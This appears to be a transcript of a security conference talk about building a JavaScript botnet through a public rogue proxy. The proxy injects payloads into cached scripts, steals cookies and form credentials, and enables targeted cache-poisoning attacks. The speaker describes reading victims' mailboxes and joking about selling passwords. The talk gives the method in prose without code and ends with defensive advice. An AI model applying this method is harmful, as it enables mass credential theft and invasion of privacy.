 Thank you for coming to this session. Owning bad guys and mafia using JavaScript, I hope you enjoyed the topic. But before starting, I would like to introduce myself and my country. I work in a small company called I 64 in Spain. I'm also a Microsoft MVP in enterprise security. And I live in Spain. Do you know Spain? Has you been to Spain any time in your life? It's not, if not, you have to go and visit our country. This is Madrid, the city in which I live. As you can see, the city that never sleeps but it's smaller than New York. And there are a lot of big places in Spain that you have to visit. This is the sacred family in Barcelona, one of the most beautiful church in the world, as you can see. And of course, there are other places that you might like to visit. This is Ibiza, a small island in which I'm going to stay tomorrow. So if you want to rest and discover a different Spain, it's very close to you. It's in Europe, just crossing the ocean. And of course, if you are a brave man, you can visit other cities with other parties. This is Pamplona. How many of you have been running balls any time in your life? There is only one rule. If you drink, don't run. That's the only rule. The rest is easy. You only need to run faster than the bull. It's very easy to do it. And of course, if you like another parties, we got something special. This is the tomatina. It's a battlefield with tomatoes, one day long, one day length. I'm not sure the story about this party, but you only need to, through tomatoes. That's all. It's quite interesting. Wow, we are Spaniards, you know. Well, let's start with today's topic. Today's topic is quite simple. Let's create a bonnet. That's all. But from the beginning, we got a lot of pronet. A lot of pronet with it. I guess that many of you have been thinking about creating a bonnet any time in your life. How many of you have been thinking about it? About create a bonnet? How many of you did it? I did it. Well, the idea of creating a bonnet is quite interesting, but of course, as you, I'm lazy. I'm from Spain, so it's normal. So we are lazy. This is a nice picture. I would like to show you this picture. Let me use Zoom. I would like to show you this picture because for Spanish people, they need a power supplier and they are using flip flops to connect it through the Zoom pool. It's incredible. This is more or less like we used to do the things in Spain. So that's the idea of creating the bonnet. We wanted to create the bonnet, but we were lazy. We haven't money. Do you know it? We haven't zero days. We are in the FBI of the NSA, so we cannot intercede for free the communications. And of course, we are not Google, Apple, or Microsoft that are running all the devices around the world. And you know, we are Spanish, so we need to do something different from the beginning. So the idea of creating the bonnet, it was quite simple. We thought, okay, let them be infected. Let's do something that allows both to be infected for themselves. So the only thing that we wanted is that they wanted to be infected. Quite simple. In the end, if you think about this topic, it's very useful and the malware industry has been used around the last five or ten years with rogue antivirus and social engineering tricks. So why not to do a bonnet doing the same trick? So the idea of creating the bonnet is just to create a money in the middle attack. There are so many money in the middle attacks that can be used in different scenarios. Of course, if we are in a network, we can use something like ARP spoofing or we can use rogue DHCP in IPv4 or IPv6 network. Money in the middle attacks in IPv6 networks, we are going to publish a new tool, a new foca, which is the evil foca to perform money in the middle attacks in IPv6 network just pointing and click. Quite simple. And of course, if you are able to manage the DNS, you can do the money in the middle attack. But it's quite complicated if you are thinking about the internet because you have to deal with a lot of providers, internet providers and networks. So it's difficult to use an internet. One of the most used in the internet several years ago is the money in the browser in which just another one is installing the browser. Another one like a browser helper object in internet explorer. And a lot of example of malware having used this trick. We got a lot of malware from Russian, using this trick. This is very useful and it works so well that they need special files to configure the Trojan to attack all different banks. This is a very ancient Trojan, banking Trojan using an XML file to configure the money in the browser to control all different web pages from different banks. Quite simple and it works very well. But we needed to code in something and deal with antivirus system, managing detection programs. So we decided that it was very complicated for us and we needed something easier. So we talked about the money in the top or JavaScript in the middle. The idea is quite simple. If you are able to run our JavaScript in one tap, you can do a lot of things. You can access to the code, you can modify the HTML, you can access to the form fields, you can manage even the not supposed to be managed cookies like HTTP only cookies using different tricks and so on. In fact, there are a very well now project which is with the browser application framework project that allows you to do a lot of things just installing a small piece of JavaScript code in a browser. So the idea is just to do a cache poisoning. The problem is that we needed to configure this on the internet and it's quite complicated. You want to infect a lot of bots on the network. So we were thinking about how to do it easy and we did this. So the idea is how to create a JavaScript bonnet from scratch and it's quite simple. First of all, we thought about the turnouts but the idea with turnouts is quite simple. If you are the last one on the line, you will be able to access to all content, you will be able to intercept all communications. The problem when we tried to create the rogue turnout, it was that they are using some security test to discover who is modifying the answer of the DNS or who is having some special files and so on. And we were detected as you can see. So we thought, well, it's too complicated. We need to detect when they are sending the test and creating an exception for the test. No, too difficult. We are Spanish. The next thing that we did is just to create a proxy. To create a proxy is quite simple because a proxy is not a big infrastructure like the Tor network in which all are connected. A proxy server is just a standalone server that people decide to connect to. So the idea is that if you read all the manuals on the internet about how to be anonymous, the first thing is connect to any proxy server on the internet. So without way. It is very interesting because it's a money in the middle schema. So if we are a proxy server on the internet and people decide to connect to the internet through our proxy server, we will be able to collect all data and infect all browsers. So we did it. The first thing that we need to do is just to rent a server on the internet. Of course, you have to take care about what kind of server are you going to use. Don't use any private-based server, not even in Amazon. Remember what happened with WikiLeaks. Not in Megabloo. It's better if you select any country in which there are no laws. So we were renting servers on Iraq, Afghanistan, and Kazakhstan, Spain. Then one, sorry. Once you start, you rent a server, you only need to configure something which is very simple, Apache web server and squid proxy. And the idea is that with this server we were going to infect all JavaScript files with one small piece of code, two lines only. So when the user connect to our proxy server, we go to the website, we got the response page, okay, and the response page has a JavaScript file. Then we retrieve the original JavaScript and then we added only two lines to load the payload. A new payload. We didn't want to use any payload very well now on the internet like beef. So we just coding two lines and install that two lines in all JavaScript files that were across our proxy server. So in the end, only need to do this. First of all, we created a rewrite program to add that line of code. So we need to configure this option in squid proxy. And then we added the non-expiration policy in Apache because once we infect a JavaScript file in the web browser, we want it to be there forever. Then the code that we needed to create is just this. It's a parallel script as you can see. And the only thing that we are doing is we retrieve the file with using W get. We copy it into our file system and then we add it or Pasadela JavaScript file to the JavaScript. And then of course we send the JavaScript, the new JavaScript to the client using a print. It's a very small piece of code. It's full of common injection vulnerabilities but it works. The JavaScript is just this. It's a small piece of code and we are just connecting to the control panel. And the only check that we do is just that we are running only one instance of the payload in every tab. So simple. And of course we wanted, we don't wanted to do anything bad to good people. So we created an special advice on the web page of our server saying following. Following proxy server is being used for a security research. All JavaScript files will be infected and all your data will be collected. If you want to be safe, don't use this proxy server. If you know that, don't send sensitive information. After all, you continue on your own risk. So we publish this. So if you don't want it to lose your passwords, if you don't want it to be infected, don't use our proxy. That's quite simple. It's a good security policy. No, no. Actually, in the army, you got the same security policies. One in the following and security side is for temporary loading and unloading. On your own risk. This is a web page from the army.mil. So it's the same security policy. So it's legal. So the next thing that we need to do is just to make our proxy server public. So we copy our IP address and publish the IP address and the porn army on our proxy server list, as you can see, Xroxy. And then just let the internet do its magic. And as you can see, in a few days, we got 1,110 different results about our IP address because all proxy server lists are copying themselves. So if you publish your IP address in one proxy server list, they are copying the same IP address to all proxy server lists. Which is funny because in one hour, in one day, you can have a lot of bops. So the next thing that we do is just to create a small piece of payload. So the first one is just cookie stealing. We were running our JavaScript inside. We didn't want it to deal with HTTPS connection. We didn't want it to deal with secure cookies. We didn't want it to deal with HTTP-only cookies. So we just copied the normal cookies, the unsecured cookies, and sent the cookies to our control panel just using a get. Then we created a small payload to grab all form fields. The idea is that we hook the submit function, copy all the information in the fields, and send the fields value to our control panel. And that's all. Just enjoy. Doing this, in one day, we were able to get 5,000 bots, which is not bad. No paying per install, not creating any special polymorphic malware, not doing just publishing one IP address on the internet. We are from Spain, you know? So the question is, who the hell is using this kind of services on the internet? How many of you are using this kind of services on the internet? No. If you read all manuals, if you want to be anonymous, use anonymous proxy server. If you want to be more anonymous, use more than one anonymous proxy server, which is cool because you can be in fact for more than one proxy server. And the idea is that the kind of people who is using that services is of course bad people. All the things that we were able to collect were bad people doing bad things. So of course, the first thing that we discovered is the Nigerian scammers. We collect all information. Of course, we collect also username and passwords. But we advertise them. So it's all legal. So we want, once we got the password, we get into the mailboxes of those people. And well, this is one of my favorites. There were a lot of people doing this. This is one of my favorites. As you can see, the email name is Royal Hotel England and Hotmail.co.uk. And that guy was creating an spam campaign trying to scam people with visa, visa schema. The idea is he was offering to the victims, a special visa to get a job in the UK. Of course, this is the email. He was asking for money, 275 pounds. And he was asking for money. And a lot of people were suspicious. Saying, okay, I respect you, kind of information, but show me the money. Show me the job before. Show me the job and then I send the money. Of course, if the guy was suspicious, the scammer wasn't continuing with the scam. But others weren't so suspicious. So in the end, they were sending all the information needed to create the visa. As you can see, passport, application form, my resume, passport, passport, passport, high quality picture for the passport in the UK, fingertips, as you can see, and so on. A lot of people sending, this is the easiest way of identity theft that I've seen in my life. For sure. And if you got all this information, you probably can create your own mule to use in malware, in banking malware. So quite simple. Another one which is one of my favorites is this guy. Well, how do you see this guy? This is a profile in a social network for having a flint and that kind of things. How do you look to that guy? How many of you really think that that girl needs to search for a boy on the internet? Well, it was very suspicious for us at the beginning. So we decided to collect the username and password of this profile and analyze what she was doing. And in the end, as you can see, this ancient queen, here is searching for a relationship and dating. It's from Texas and it's 30. But she has another profile in another network. In this case, she is from New Zealand. It's 31 and it's Arias and so on. And in another profile, she lives in Virginia. Any person from Virginia who has seen this girl? And of course, the most wonderful is that in other profiles, she looks completely different. She is from German. So in the end, we decided to get into the email box and we were reading the information that she was starting there. Well, that guy, of course, is not a girl. He is a boy. He was collecting chats of people who were in contact with that profile. So that profiles are for phishing victims. And this is one of my favorite chats in which KK Bill is the girl. This is supposed to be the girl. And Fiat 176 is the victim. Hello, sweetie. Hello, my sweet mouse. I think we need an A. The second one is nice. How are you doing? I want to say doing. Well, in the chat, in the chat, you can see, I'm sorry, in the chat, they are discussing the details of their love. And the details are 700 euro that need to be sent in a chain for the nicked picture. I don't know what kind of picture at this one. And the point is that this boy, this predator, is a multitasking scammer. So he is chatting with different people at the same time. And he also fails. And in the middle of the chat, he started to chat in German. I think so. It's crazy. So we were inside the e-mail box. And it's quite nice because he has all the victims very well classified in his e-mail box. And there is a folder with all the chats in which he is working right now. And we were searching for mails asking for money through Western Union. And as you can see, there was 158 messages searching, asking for money from Western Union. So quite simple. And the mails were like this. Hello, sweetie. Why do you have a nosed nicked picture? Hello, baby. I don't know about my bank manager asking me that the other city and country is not possible. It's not possible. Now we can redo. Of course, she is asking for money that need to be transferred to different country in which it's supposed to be living that fake profile. And she get hungry. Fuck it, stop playing game on me. I gave you right address and was your manager. Well, you can imagine the rest of the e-mails. Another of the scammers in that test that we did was someone very weird, because he was doing something strange with dogs. We weren't sure about what he was doing with dogs and what and why he needed to be using a proxy server on the internet, an anonymous proxy server on the internet. So we decided to use the username and password to get into the e-mail box and we discovered something very hard. We discovered picture. Please, this is a warning. If you are not, if you love animals, please don't see this picture because this is the picture. He was selling this fake George side because in the end he was selling the same George side around the world. So it's the most profitable George side in the world. He was just publishing the same picture in a lot of places selling dogs and any money, making money from it. Of course, we discovered psychotics. This is the control panel, how the control panel looks like. And as you can see, this guy was searching in XNXX, searching for mother, rape sister, violent rape, violence. So we were about to send this IP address to column police because this guy is not normal. Also, people trying to be anonymous, a lot of people trying to be anonymous and the first thing that they were doing, it was just to test if they were anonymous. The problem is that if you are using a proxy server, you are anonymous to the end page, but not to the proxy server. So the proxy server can track you anytime. It's quite simple. So, okay, you are anonymous. We don't know that you are from the states. Okay, your IP address is this and we know the real IP address. So it's quite simple. A lot of cases of people doing the same, trying to be anonymous. This is the word case we discovered. It's a guy trying to make out money of reading blog posts. It's supposed to be a business. You read the blog posts of anyone around the world and you will be paid for it. And after one month, he was able to earn 24 bucks. So I know sure that it is so good business right now. Of course, we discovered a lot of people hacking, doing the phasing and so on. And this is one of our favorite. As you can see in the control panel, we got the local files in the website that have been hacked. This is a web cell. And the idea of this web cell, of course, we connect to the site, to the website, and it was, it was, it has the face, as you can see, the email address of the hacker. So it was anonymous, but you got the email address. I don't understand this very well. But the problem is that this hacker was using a web cell and the web cell was hacked with a JavaScript. Do you know? Probably you know that there are a lot of web cells on the internet with a small piece of JavaScript that are copying your web cell, and you are tried by this web cell. This web cell was tried, and of course, it was tried by a JavaScript file. So when the JavaScript file grows through our proxy server, we fed that JavaScript, and then we owned the web cell of the hacker. So in the end, the hacker who was hacking was hacked. Also, one of our favorite thing is that once you are using a proxy server, if you disconnect from the proxy server, but you don't erase your cache, you will be in fact for the, for the rest of the time. Because the JavaScript is on your, on your cache. So the idea is that we discovered that some intranet applications were using JavaScript from the internet. So we were able to discover, to infect that JavaScript and then we infect the intranet application. In this case, this is a guy from Mexico. He wanted to, to browse for some form on the internet and then disconnect from the proxy server, but he was in fact, and as you can see, this is an internal, an internal server. We weren't able to connect to it, but there is an ERP application with data and of course, the, a lot of information of the user and the password and so on. But we, we couldn't connect to, to that intranet because it is not public on, on the internet. And of course, porn. A lot of porn, people searching for porn. Porn is the business, believe me, not hacking porn, porn, porn. Even we were, we were discovering this, this is a very nice story in which, in a charge, in a charge, in a Catholic charge was discovered this painting from monks, since seven, seven centuries before, they were painting pinnets. It's true. So we were collecting URLs and we discovered a lot of URLs of, of porn, of course, a lot of user name and password that we've been selling on the internet, of course. But the most, the most, the most weird page is chat to rate. Believe me, if you never watch that website, chat to rate is completely different. So in the end, once we got the, the, the JavaScript bonus, once we got the, the bots in fact with JavaScript, you can create a special payload. And of course, if you are connecting through a proxy server, probably you won't connect to your banking system, or you, you are not going to connect to your social profile, or you are not going to connect to your intranet or your personal website or whatever. But if you don't claim your cash, you are in fact, if someone forced you to load a JavaScript file, which is in the web page that you are going to visit after being used in the proxy server, then you will be hacked. So in this example, we got a LinkedIn.com and as, as you can see, there are some scripts that are load in JavaScript, in LinkedIn website. So if you are using the proxy server, then we can create a special payload forcing you to download these JavaScript files. Then this JavaScript file will be in Fed. Once you disconnect and connect to LinkedIn, the, our payload will be execute. It's so simple. So we can create a special target attacks to several websites collecting passwords of people who were using a proxy server before on the internet. It's quite, quite simple. So you only need to select the target, whatever, bang, social network, intranet, analyze the, the files that are, are going to be load by this website and forced to, to load this file when the guy, when the victim is connected to the, to the proxy server. It's quite simple. So I wanted to do a demo in real, but I would like to show you the, the control panel, how it looks like because we, we, of course, we, we turn off the proxy server on the internet time ago, but for Blahat and Defcon, I've been, I create a, a new control panel, but I didn't publish this proxy server on the internet. But after delivering the talk in Blahat, I don't know why someone publish on the internet. So we configure this proxy only for 10 parallel connections, only for 10 parallel connections. And right now, this morning, I'm going to show you the, the bots. We view zombies, old zombies. And as you can see, if we search for the date, 28, which is today, today, we started to receive a lot of bots from today, from different countries, a lot of from the states, states, Brazil, whatever. And we got a lot of information right now collect from them. We didn't want to do it. We didn't publish the IP address, believe me. But the demo that I would like to show you is more or less this. I wanted to, to do the demo with them. And let me show the website, which is members. This is the California Union League. As you can see, this website is perfect for a target attack because it's an HTTP, it's an HTTP website in which there is a login form which is going to send the credentials to a, an HTTPS web server. But we can inject a JavaScript file very easily in the, in the HTTP website, hook the form and collect the username and password from this website. So the only thing that we need to do in our control panel is analyze the target and select one file. In this example, I select members, ccul.org, script, gataq, jataq.javascript, as you can see. And then in our control panel create some special payload. So we go to the control panel and you can see we got preset attacks in which you can configure what is, what is interest for you. And in the California Credit Union League the only thing that we need to do is to force to download this file. So the guy who is using our proxy server that is watching form and is in fact will be downloading this file to the cache. He is, he will be watching form, hacking website, whatever. But at the same time he will be downloading this JavaScript file for the target attacks. So then when he was disconnect, when he was, when he will be disconnect in this case select not to be connect anymore, the JavaScript file which is in the cache will be in fed with our payload because we don't let it before. And this file is not out of date. So the browser will be using. So in the end after the guy connect to the website sending the information that form will be hooked and we are going to be able to retrieve all the, this data in our, in our control panel. It's so simple, so easy to do and very profit. So some thoughts about our JavaScript botnet. In this example we didn't worry at all about doing something special with the HTTPS connection. We didn't worry about pre-cache object using the attack or using special tricks for, to force the aspiration, the aspiration of the object that are previously in the cache. And we didn't want it to use, to do something with the HTTPS connection because we didn't want it to rise any alert. So we, and of course we didn't, we didn't have any flame digital certificate and Moxie was very busy tweeting so we cannot contact within to create the, the special digital certificate. And the idea, the good point of it is that we did it only in one day. So in one day we were able to configure the proxy server, configure the, the Apache, publish the IP address, create the JavaScript and collect all this information. So if we were able to do this in only one day, the problem is how many of you think that governments, intelligence services, bad guys aren't, aren't doing the same on the internet? The question is how many of you think that only one of those proxy servers on the internet is secure? Only one. How many of you think that only one of those proxy server is secure? No one? Secure? I don't think so. Secure. No, that is not going to affect you or collect your data. The one you run is not anonymous proxy server, it's yours. It's completely different. So in the end, using a proxy server on the internet is a very bad idea but we got thousands and thousands and thousands of web pages on the internet saying people if you want to be anonymous use a proxy server on the internet. So we are going to have this problem a long time, a long time, a long time. So don't use it. So some protection, of course, this is a man in the middle schema and it's a man in the middle schema in which you decide to, to be hacked because you configure your web browser to use that man in the middle, that proxy server. So you have to think twice if it's worth it to be using that proxy server. And of course the problem is with tor networks but right now we got more news about fake tor networks, tor nodes or rogue tor nodes on the internet than fake or rogue proxy server on the internet and I don't know why. And of course after using this kind of services if you need to do this for whatever reason you have to take care and clean all the information that you don't love from the internet, take special care with that machine. If you, if it's possible use a new virtual machine and burn it out after using, throw it to the trash, whatever you want. And of course VPNs are not a silver ballad because in this case we were able to discover a lot of people connecting to a personal VPN to be outside of the network in which they were connecting and then from the VPN connect to a proxy server and in the end it's possible to infect the client in any case. So take care of it. And that's all. Tomorrow I'm going to be delivering a new talk in Sky Talks at 17 about how to do a domain pull the plug attack and if you want to do any question I'm going to be in the Q and A room for traction. Thank you very much.